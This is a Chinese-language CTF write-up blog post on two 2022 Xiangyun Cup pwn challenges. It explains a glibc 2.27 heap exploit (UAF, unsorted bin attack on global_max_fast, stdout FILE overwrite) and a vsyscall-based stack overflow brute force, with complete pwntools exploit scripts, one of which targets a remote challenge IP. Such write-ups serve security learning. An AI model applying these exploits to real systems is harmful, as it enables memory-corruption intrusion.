

<!DOCTYPE html>
<html lang="en" color-mode=light>
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <title>2022-11-11-2022祥云杯 - ShouCheng</title>
  <meta name="apple-mobile-web-app-capable" content="yes" />
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta name="google" content="notranslate" />
  
  <meta name="description" content="leaklibc版本为2.27， 沙箱开了跟没开差不多...">
  <meta name="author" content="ShouCheng">
  <link rel="icon" href="/images/icons/favicon-16x16.png" type="image/png" sizes="16x16">
  <link rel="icon" href="/images/icons/favicon-32x32.png" type="image/png" sizes="32x32">
  <link rel="apple-touch-icon" href="/images/icons/apple-touch-icon.png" sizes="180x180">
  <meta rel="mask-icon" href="/images/icons/stun-logo.svg" color="#333333">
  
    <meta rel="msapplication-TileImage" content="/images/icons/favicon-144x144.png">
    <meta rel="msapplication-TileColor" content="#000000">
  

  
<link rel="stylesheet" href="/css/style.css">


  
    
<link rel="stylesheet" href="//at.alicdn.com/t/font_1445822_r673sha78lq.css">

  

  
    
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.5.7/jquery.fancybox.min.css">

  

  
    
      
        
        
<link rel="stylesheet" href="https://cdn.bootcss.com/highlight.js/9.18.1/styles/xcode.min.css" name="highlight-style" mode="light">

      
        
        
<link rel="stylesheet" href="https://cdn.bootcss.com/highlight.js/9.18.1/styles/solarized-dark.min.css" name="highlight-style" mode="dark">

      
  

  <script>
    var CONFIG = window.CONFIG || {};
    var ZHAOO = window.ZHAOO || {};
    CONFIG = {
      isHome: false,
      fancybox: true,
      pjax: false,
      lazyload: {
        enable: true,
        only_post: 'false',
        loading: '[object Object]'
      },
      donate: {
        enable: false,
        alipay: '',
        wechat: ''
      },
      galleries: {
        enable: true
      },
      fab: {
        enable: true,
        always_show: false
      },
      carrier: {
        enable: true
      },
      daovoice: {
        enable: true
      },
      preview: {
        background: {
          default: '',
          api: ''
        },
        motto: {
          default: '总之岁月漫长，然而值得等待！',
          typing: true,
          api: 'https://v2.jinrishici.com/one.json',
          data_contents: '["data","content"]'
        },
      },
      qrcode: {
        enable: true,
        type: 'url',
        image: '',
      },
      toc: {
        enable: true
      },
      scrollbar: {
        type: 'default'
      },
      notification: {
        enable: true,
        delay: 4500,
        list: '',
        page_white_list: '',
        page_black_list: ''
      },
      search: {
        enable: true,
        path: '/search.xml'
      }
    }
  </script>

  

  

<meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="ShouCheng" type="application/atom+xml">
</head>

<body class="lock-screen">
  <div class="loading"></div>
  
    


  <nav class="navbar">
    <div class="left">
      
        <i class="iconfont iconhome j-navbar-back-home"></i>
      
      
        <i class="iconfont iconqrcode j-navbar-qrcode"></i>
      
      
        <i class="iconfont iconmoono" id="color-toggle" color-toggle="light"></i>
      
      
        <i class="iconfont iconsearch j-navbar-search"></i>
      
    </div>
    <div class="center">2022-11-11-2022祥云杯</div>
    <div class="right">
      <i class="iconfont iconmenu j-navbar-menu"></i>
    </div>
    
      <div id="qrcode-navbar"></div>
    
  </nav>

  
  

<nav class="menu">
  <div class="menu-container">
    <div class="menu-close">
      <i class="iconfont iconbaseline-close-px"></i>
    </div>
    <ul class="menu-content"><li class="menu-item">
        <a href="/ " class="underline "> 首页</a>
      </li><li class="menu-item">
        <a href="/galleries/ " class="underline "> 摄影</a>
      </li><li class="menu-item">
        <a href="/archives/ " class="underline "> 归档</a>
      </li><li class="menu-item">
        <a href="/tags/ " class="underline "> 标签</a>
      </li><li class="menu-item">
        <a href="/categories/ " class="underline "> 分类</a>
      </li><li class="menu-item">
        <a href="/about/ " class="underline "> 关于</a>
      </li></ul>
    
      <div class="menu-copyright"><p>Powered by <a target="_blank" href="https://hexo.io">Hexo</a>  |  Theme - <a target="_blank" href="https://github.com/izhaoo/hexo-theme-zhaoo">zhaoo</a></p></div>
    
  </div>
</nav>
  <main id="main">
  <div class="article-wrap">
    <div class="row container">
      <div class="col-xl-3"></div>
      <div class="col-xl-6"><article class="article">
  <div class="wrap">
    <section class="head">
  <img   class="lazyload" data-original="/images/theme/post-image.jpg" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="  draggable="false">
  <div class="head-mask">
    <h1 class="head-title">2022-11-11-2022祥云杯</h1>
    <div class="head-info">
      <span class="post-info-item"><i class="iconfont iconcalendar"></i>November 11, 2022</span>
      
      <span class="post-info-item"><i class="iconfont iconfont-size"></i>3777</span>
    </div>
  </div>
</section>
    <section class="main">
      <section class="content">
        <h2 id="leak"><a href="#leak" class="headerlink" title="leak"></a>leak</h2><p>libc版本为2.27， 沙箱开了跟没开差不多。。</p>
<p><img   class="lazyload" data-original="/2022/11/11/2022-11-11-2022%E7%A5%A5%E4%BA%91%E6%9D%AF/image-20221111223338481.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20221111223338481</span></p>
<p><img   class="lazyload" data-original="/2022/11/11/2022-11-11-2022%E7%A5%A5%E4%BA%91%E6%9D%AF/image-20221111223405916.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20221111223405916</span></p>
<p>程序含有加密和解密的两个函数，这两个函数十分复杂，但是无需用到，其他几个简单的函数里面的功能已经足够获取到flag了。</p>
<p><img   class="lazyload" data-original="/2022/11/11/2022-11-11-2022%E7%A5%A5%E4%BA%91%E6%9D%AF/image-20221111223552784.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20221111223552784</span></p>
<p>flag已经提前读取到了一个堆块内。</p>
<p><img   class="lazyload" data-original="/2022/11/11/2022-11-11-2022%E7%A5%A5%E4%BA%91%E6%9D%AF/image-20221111223639107.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20221111223639107</span></p>
<p>释放堆块存在UAF。</p>
<p><img   class="lazyload" data-original="/2022/11/11/2022-11-11-2022%E7%A5%A5%E4%BA%91%E6%9D%AF/image-20221111223451708.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20221111223451708</span></p>
<p>可以申请十六次堆块，堆块大小十分宽松，在0x60000以内即可，写堆块直接就是read读入。</p>
<p><img   class="lazyload" data-original="/2022/11/11/2022-11-11-2022%E7%A5%A5%E4%BA%91%E6%9D%AF/image-20221111223736604.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20221111223736604</span></p>
<p>所以题目的重点在于把堆块内的 flag 打印出来即可，这题可以 IO 打印出堆块内容。通过 unsorted bin attack 改大 global_max_fast ，造成 fastbinY 数组溢出，从而释放大堆块后可以往 main_arena 后面的地址上写入堆地址，本题选择往 write_base 和 write_ptr 写入内容，最后 exit 退出刷新 IO，即可打印出 flag 。 </p>
<p>计算申请的 size 公式为：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">size = (target_addr - main_arena - <span class="hljs-number">0x18</span>) * <span class="hljs-number">2</span> + <span class="hljs-number">0x20</span><br></code></pre></td></tr></table></figure>

<p>还可以往 main_arena 后面的地址上写入任意的 8 位十六进制数，因为在 malloc 的时候会把 fastbinsY 的链表头部取出，并且把其 fd 位置的内容作为链表头部写入到 fastbinsY 数组中，而在这个过程中是没有对可控堆块的 fd 位置的内容的合法性做检查。</p>
<p>最后一个小问题就是，要写入 write_base 位置的堆块最好能距离存放 flag 堆块在 0x100 内，这样可以避免堆地址随机化 1/16。</p>
<p>成功打印 flag 。</p>
<p><img   class="lazyload" data-original="/2022/11/11/2022-11-11-2022%E7%A5%A5%E4%BA%91%E6%9D%AF/image-20221111231643391.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20221111231643391</span></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#!usr/bin/env python </span><br><span class="hljs-comment">#coding=utf-8</span><br><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>context(arch = <span class="hljs-string">&#x27;amd64&#x27;</span>,os = <span class="hljs-string">&#x27;linux&#x27;</span>,log_level = <span class="hljs-string">&#x27;debug&#x27;</span>)<br>elf = ELF(<span class="hljs-string">&#x27;./leak&#x27;</span>)<br>DEBUG = <span class="hljs-number">1</span><br><span class="hljs-keyword">if</span> DEBUG:<br>    libc = ELF(<span class="hljs-string">&quot;/home/shoucheng/tools/glibc-all-in-one/libs/2.27-3ubuntu1.6_amd64/libc-2.27.so&quot;</span>)<br>    ld = ELF(<span class="hljs-string">&quot;/home/shoucheng/tools/glibc-all-in-one/libs/2.27-3ubuntu1.6_amd64/ld-2.27.so&quot;</span>)<br>    p = process(argv=[ld.path,elf.path], env=&#123;<span class="hljs-string">&quot;LD_PRELOAD&quot;</span> : libc.path&#125;)<br><span class="hljs-keyword">else</span>:<br>    ip = <span class="hljs-string">&#x27;127&#x27;</span><br>    port = <span class="hljs-number">30007</span><br>    libc = ELF(<span class="hljs-string">&quot;./libc.so.6&quot;</span>)<br>    p = remote(ip, port)<br>    <br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">debug</span>(<span class="hljs-params">info=<span class="hljs-string">&quot;b main&quot;</span></span>):</span><br>	gdb.attach(p, info)<br>	<span class="hljs-comment">#gdb.attach(p, &quot;b *$rebase(0x)&quot;)</span><br><br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">add</span>(<span class="hljs-params">idx, size</span>):</span><br>    p.sendlineafter(<span class="hljs-string">b&quot;Your choice: &quot;</span>, <span class="hljs-string">b&#x27;1&#x27;</span>)<br>    p.recvuntil(<span class="hljs-string">b&quot;Index: &quot;</span>)<br>    p.sendline(<span class="hljs-built_in">str</span>(idx).encode(<span class="hljs-string">&#x27;ascii&#x27;</span>))<br>    p.recvuntil(<span class="hljs-string">b&quot;Size: &quot;</span>)<br>    p.sendline(<span class="hljs-built_in">str</span>(size).encode(<span class="hljs-string">&#x27;ascii&#x27;</span>))<br>	<br>	<br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">edit</span>(<span class="hljs-params">idx, content</span>):</span><br>    p.sendlineafter(<span class="hljs-string">b&quot;Your choice: &quot;</span>, <span class="hljs-string">b&#x27;2&#x27;</span>)<br>    p.recvuntil(<span class="hljs-string">b&quot;Index: &quot;</span>)<br>    p.sendline(<span class="hljs-built_in">str</span>(idx).encode(<span class="hljs-string">&#x27;ascii&#x27;</span>))<br>    p.recvuntil(<span class="hljs-string">b&quot;Content: &quot;</span>)<br>    p.send(content)<br><br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">free</span>(<span class="hljs-params">idx</span>):</span><br>    p.sendlineafter(<span class="hljs-string">b&quot;Your choice: &quot;</span>, <span class="hljs-string">b&#x27;3&#x27;</span>)<br>    p.recvuntil(<span class="hljs-string">b&quot;Index: &quot;</span>)<br>    p.sendline(<span class="hljs-built_in">str</span>(idx).encode(<span class="hljs-string">&#x27;ascii&#x27;</span>))<br><br>    <br>add(<span class="hljs-number">0</span>, <span class="hljs-number">0xa48</span>*<span class="hljs-number">2</span>+<span class="hljs-number">0x20</span>)  <span class="hljs-comment"># base</span><br>add(<span class="hljs-number">1</span>, <span class="hljs-number">0xa50</span>*<span class="hljs-number">2</span>+<span class="hljs-number">0x20</span>)  <span class="hljs-comment"># ptr</span><br>add(<span class="hljs-number">2</span>, <span class="hljs-number">0xa28</span>*<span class="hljs-number">2</span>+<span class="hljs-number">0x20</span>)  <span class="hljs-comment"># IO flag</span><br>add(<span class="hljs-number">3</span>, <span class="hljs-number">0xa48</span>*<span class="hljs-number">2</span>+<span class="hljs-number">0x20</span>)  <br>add(<span class="hljs-number">4</span>, <span class="hljs-number">0xa50</span>*<span class="hljs-number">2</span>+<span class="hljs-number">0x20</span>) <br>add(<span class="hljs-number">5</span>, <span class="hljs-number">0xa28</span>*<span class="hljs-number">2</span>+<span class="hljs-number">0x20</span>) <br>add(<span class="hljs-number">6</span>, <span class="hljs-number">0x430</span>)<br>add(<span class="hljs-number">7</span>, <span class="hljs-number">0x10</span>)<br>free(<span class="hljs-number">6</span>)<br>debug()<br>lw = <span class="hljs-built_in">eval</span>(<span class="hljs-built_in">input</span>(<span class="hljs-string">&quot;tow bytes==&gt;&quot;</span>)) <span class="hljs-comment"># 本地调试避免 1/16 的随机化。</span><br>edit(<span class="hljs-number">6</span>, p64(<span class="hljs-number">0</span>) + p16(lw - <span class="hljs-number">0x10</span>))<br>add(<span class="hljs-number">8</span>, <span class="hljs-number">0x430</span>)<br>free(<span class="hljs-number">0</span>)<br>free(<span class="hljs-number">1</span>)<br>free(<span class="hljs-number">2</span>)<br><br>free(<span class="hljs-number">3</span>)<br>edit(<span class="hljs-number">3</span>, p8(<span class="hljs-number">0</span>))<br>add(<span class="hljs-number">9</span>, <span class="hljs-number">0xa48</span>*<span class="hljs-number">2</span>+<span class="hljs-number">0x20</span>)<br>free(<span class="hljs-number">4</span>)<br>edit(<span class="hljs-number">4</span>, p8(<span class="hljs-number">0</span>))<br>add(<span class="hljs-number">10</span>, <span class="hljs-number">0xa50</span>*<span class="hljs-number">2</span>+<span class="hljs-number">0x20</span>)<br>free(<span class="hljs-number">5</span>)<br>edit(<span class="hljs-number">5</span>, p64(<span class="hljs-number">0xfbad1800</span>))<br>add(<span class="hljs-number">11</span>, <span class="hljs-number">0xa28</span>*<span class="hljs-number">2</span>+<span class="hljs-number">0x20</span>)<br>p.sendlineafter(<span class="hljs-string">b&quot;Your choice: &quot;</span>, <span class="hljs-string">b&#x27;6&#x27;</span>)<br>p.interactive()<br></code></pre></td></tr></table></figure>

<h2 id="unexploitable"><a href="#unexploitable" class="headerlink" title="unexploitable"></a>unexploitable</h2><p>题目只给了一个栈溢出，没有调用任何的输出函数，保护除了canary都开了。利用<code>vsysycall 0xffffffffff600000</code>滑到主函数的返回地址，然后对进行 1/4096 的爆破。。。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#!usr/bin/env python </span><br><span class="hljs-comment">#coding=utf-8</span><br><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">import</span> random<br>context(arch = <span class="hljs-string">&#x27;amd64&#x27;</span>,os = <span class="hljs-string">&#x27;linux&#x27;</span>,log_level = <span class="hljs-string">&#x27;debug&#x27;</span>)<br>elf = ELF(<span class="hljs-string">&#x27;./unexploitable&#x27;</span>)    <br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">debug</span>(<span class="hljs-params">info=<span class="hljs-string">&quot;b main&quot;</span></span>):</span><br>	gdb.attach(p, info)<br>	<span class="hljs-comment">#gdb.attach(p, &quot;b *$rebase(0x)&quot;)</span><br><span class="hljs-keyword">while</span> <span class="hljs-literal">True</span>:<br>    <span class="hljs-keyword">try</span>:<br>        <span class="hljs-comment">#p = process(&quot;./unexploitable&quot;)</span><br>        p = remote(<span class="hljs-string">&#x27;47.95.3.91&#x27;</span>, <span class="hljs-number">38768</span>)<br>        p.send(<span class="hljs-string">b&#x27;a&#x27;</span>*<span class="hljs-number">0x18</span>+ p64(<span class="hljs-number">0xffffffffff600000</span>)*<span class="hljs-number">2</span> + <span class="hljs-string">b&#x27;\x02\x93\x30&#x27;</span>) <br>        sleep(<span class="hljs-number">0.1</span>)<br>        p.sendline(<span class="hljs-string">b&#x27;ls&#x27;</span>)<br>        <span class="hljs-keyword">if</span> <span class="hljs-string">b&#x27;flag&#x27;</span> <span class="hljs-keyword">in</span> p.recv(timeout=<span class="hljs-number">0.5</span>):<br>            p.sendline(<span class="hljs-string">b&#x27;cat flag&#x27;</span>)<br>            pause()<br>        <span class="hljs-keyword">else</span>:<br>            p.close()<br>            <span class="hljs-keyword">continue</span><br>        p.interactive()<br>    <span class="hljs-keyword">except</span>:<br>        p.close()<br></code></pre></td></tr></table></figure>


      </section>
      <section class="extra">
        
          <ul class="copyright">
  
    <li><strong>本文作者：</strong>ShouCheng</li>
    <li><strong>本文链接：</strong><a href="http://shoucheng3.github.io/2022/11/11/2022-11-11-2022%E7%A5%A5%E4%BA%91%E6%9D%AF/index.html" title="http:&#x2F;&#x2F;shoucheng3.github.io&#x2F;2022&#x2F;11&#x2F;11&#x2F;2022-11-11-2022%E7%A5%A5%E4%BA%91%E6%9D%AF&#x2F;index.html">http:&#x2F;&#x2F;shoucheng3.github.io&#x2F;2022&#x2F;11&#x2F;11&#x2F;2022-11-11-2022%E7%A5%A5%E4%BA%91%E6%9D%AF&#x2F;index.html</a></li>
    <li><strong>版权声明：</strong>本博客所有文章均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" title="BY-NC-SA" target="_blank" rel="noopener">BY-NC-SA</a> 许可协议，转载请注明出处！</li>
  
</ul>
        
        
        
  <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/PWN/" rel="tag">PWN</a></li></ul> 

        
  <nav class="nav">
    <a href="/2022/11/17/2022-11-17-2022%E5%BC%BA%E7%BD%91%E6%8B%9F%E6%80%81/"><i class="iconfont iconleft"></i>2022-11-17-2022强网拟态</a>
    <a href="/2022/09/19/2022-09-19-%E7%BE%8E%E5%9B%A2CTF/">2022-09-19-美团CTF<i class="iconfont iconright"></i></a>
  </nav>

      </section>
      
        <section class="comments">
  
    <div class="btn" id="comments-btn">查看评论</div>
  
  
</section>
      
    </section>
  </div>
</article></div>
      <div class="col-xl-3">
        
          
  <aside class="toc-wrap">
    <h3 class="toc-title">文章目录：</h3>
    <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#leak"><span class="toc-text">leak</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#unexploitable"><span class="toc-text">unexploitable</span></a></li></ol>
  </aside>

        
      </div>
    </div>
  </div>
</main>
  

<footer class="footer">
  <div class="footer-social"><a 
        href="tencent://message/?Menu=yes&uin=1145020611 "
        target="_blank"
        class="footer-social-item"
        onMouseOver="this.style.color= '#12B7F5'" 
        onMouseOut="this.style.color='#33333D'">
          <i class="iconfont  iconQQ "></i>
      </a><a 
        href="javascript:; "
        target="_blank"
        class="footer-social-item"
        onMouseOver="this.style.color= '#09BB07'" 
        onMouseOut="this.style.color='#33333D'">
          <i class="iconfont  iconwechat-fill "></i>
      </a><a 
        href="https://www.instagram.com/izhaoo/ "
        target="_blank"
        class="footer-social-item"
        onMouseOver="this.style.color= '#DA2E76'" 
        onMouseOut="this.style.color='#33333D'">
          <i class="iconfont  iconinstagram "></i>
      </a><a 
        href="https://shoucheng3.github.io "
        target="_blank"
        class="footer-social-item"
        onMouseOver="this.style.color= '#9f7be1'" 
        onMouseOut="this.style.color='#33333D'">
          <i class="iconfont  icongithub-fill "></i>
      </a><a 
        href="mailto:1145020611@qq.com "
        target="_blank"
        class="footer-social-item"
        onMouseOver="this.style.color=#FF3B00" 
        onMouseOut="this.style.color='#33333D'">
          <i class="iconfont  iconmail"></i>
      </a></div>
  
    <div class="footer-copyright"><p>Powered by <a target="_blank" href="https://hexo.io">Hexo</a>  |  Theme - <a target="_blank" href="https://github.com/izhaoo/hexo-theme-zhaoo">zhaoo</a></p></div>
  
</footer>
  
      <div class="fab fab-plus">
    <i class="iconfont iconplus"></i>
  </div>
  
    <div class="fab fab-daovoice">
      <i class="iconfont iconcomment"></i>
    </div>
  
  
    <a href="https://support.qq.com/product/325288# app_id" target="_blank">
      <div class="fab fab-tencent-chao">
        <i class="iconfont iconcomment"></i>
      </div>
    </a>
  
  <div class="fab fab-up">
    <i class="iconfont iconcaret-up"></i>
  </div>
  
  
  
    
<script src="/js/color-mode.js"></script>

  
  
    <div class="search">
  <div class="search-container">
    <div class="search-close">
      <i class="iconfont iconbaseline-close-px"></i>
    </div>
    <div class="search-input-wrapper">
      <i class="search-input-icon iconfont iconsearch"></i>
      <input class="search-input" type="search" id="search-input" placeholder="Search..." autofocus autocomplete="off"
        autocorrect="off" autocapitalize="off">
    </div>
    <div class="search-output" id="search-output"></div>
  </div>
</div>
  
</body>

<script src="https://cdn.bootcss.com/jquery/3.4.1/jquery.min.js"></script>



  
<script src="https://cdn.bootcdn.net/ajax/libs/jquery.lazyload/1.9.1/jquery.lazyload.min.js"></script>




  
<script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.5.7/jquery.fancybox.min.js"></script>






  
<script src="https://cdn.bootcdn.net/ajax/libs/jquery.qrcode/1.0/jquery.qrcode.min.js"></script>




<script src="/js/utils.js"></script>
<script src="/js/script.js"></script>





  

<script>
  (function (i, s, o, g, r, a, m) {
    i["DaoVoiceObject"] = r;
    i[r] = i[r] || function () {
      (i[r].q = i[r].q || []).push(arguments)
    }, i[r].l = 1 * new Date();
    a = s.createElement(o), m = s.getElementsByTagName(o)[0];
    a.async = 1;
    a.src = g;
    a.charset = "utf-8";
    m.parentNode.insertBefore(a, m)
  })(window, document, "script", "https://widget.daovoice.io/widget/0f81ff2f.js", "daovoice")
  daovoice('init', {
    app_id: "3abd194f# app_id"
  }, {
    launcher: {
      disableLauncherIcon: true,
    },
  });
  daovoice('update');
</script>



  <script>
    (function () {
      var bp = document.createElement('script');
      var curProtocol = window.location.protocol.split(':')[0];
      if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
      } else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
      }
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(bp, s);
    })();
  </script>













</html>